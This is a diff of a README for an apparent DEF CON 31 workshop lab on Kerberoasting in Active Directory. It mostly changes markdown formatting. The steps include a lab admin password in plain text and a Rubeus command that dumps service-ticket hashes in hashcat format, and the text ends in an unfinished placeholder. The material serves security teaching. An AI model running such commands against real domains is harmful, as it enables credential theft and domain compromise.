arosenmund/defcon_31_ad_good_bad_lolWut/3_kerberoasting/1_common_kerberoasting/README.md

 1. Use RunAs to run a PowerShell prompt as `WHEEL\Administrator`:

-    - Start menu -> type `run` -> click "Run (App)" -> Enter:
+    1. Start menu -> type `run` -> click "Run (App)" -> Enter:

-        ```
+    ```powershell
     runas /user:wheel\Administrator powershell.exe
     ```

-    - You will be prompted to `Enter the password for wheel\Administrator:`, at point you will enter the account's password:
+    - You will be prompted to `Enter the password for wheel\Administrator:`, which is:

-        - `12qwaszx!@QWASZX`
+        ```
+        12qwaszx!@QWASZX
+        ```

     A new PowerShell prompt with the title `Administrator: powershell.exe (running as wheel\Administrator` will open.
 Good!

     Now that we are running PowerShell as a domain admin, let's enumerate AD!

 1. Extract Rubeus:

-    ```
+    ```powershell
     cd C:\Users\Public\Desktop\LAB_FILES\assets\
     expand-archive ./Rubeus-1.6.4.zip
     cd .\Rubeus-1.6.4\Rubeus-1.6.4\
     ```

-    As a note, (Rubeus is provided as source code)[https://for528.com/rubeus].
-Some TAs will use (a well-known pre-compiled version in their attacks)[https://for528.com/ghostpack-compiled], while others will compile the tool from source.
+    As a note, [Rubeus is provided as source code](https://for528.com/rubeus).
+Some TAs will use [a well-known pre-compiled version in their attacks](https://for528.com/ghostpack-compiled), while others will compile the tool from source.

 1. Perform a Kerberoasting attack using Rubeus:

-    ```
+    ```powershell
     ./rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\Perflogs\hashes.txt
     ```

     Above we used the `/format:hashcat` option to tell Rubeus to output hashes in hashcat format.
-(The project's Roast.cs source file)[https://github.com/GhostPack/Rubeus/blob/659d98d8582573c2ff8c3a68ee0b02d7d5f8387d/Rubeus/lib/Roast.cs#L207] accepts either `john` or `hashcat` as the output options.
-Many TAs like to use (haschat)[https://for528.com/hashcat] because of its strong support for GPU cracking.
+[The project's Roast.cs source file](https://github.com/GhostPack/Rubeus/blob/659d98d8582573c2ff8c3a68ee0b02d7d5f8387d/Rubeus/lib/Roast.cs#L207) accepts either `john` or `hashcat` as the output options.
+Many TAs like to use [haschat](https://for528.com/hashcat) because of its strong support for GPU cracking.

+!!!!
+RYAN FILL ME OUT WITH THE NEXT STEPS FOR CRACKING SON !!!!
-RYAN FILL ME OUT WITH THE NEXT STEPS FOR CRACKING SON!!!!
+!!!!
+RYAN FILL ME OUT WITH THE NEXT STEPS FOR CRACKING SON !!!!

 ### DANGER WILL ROBINSON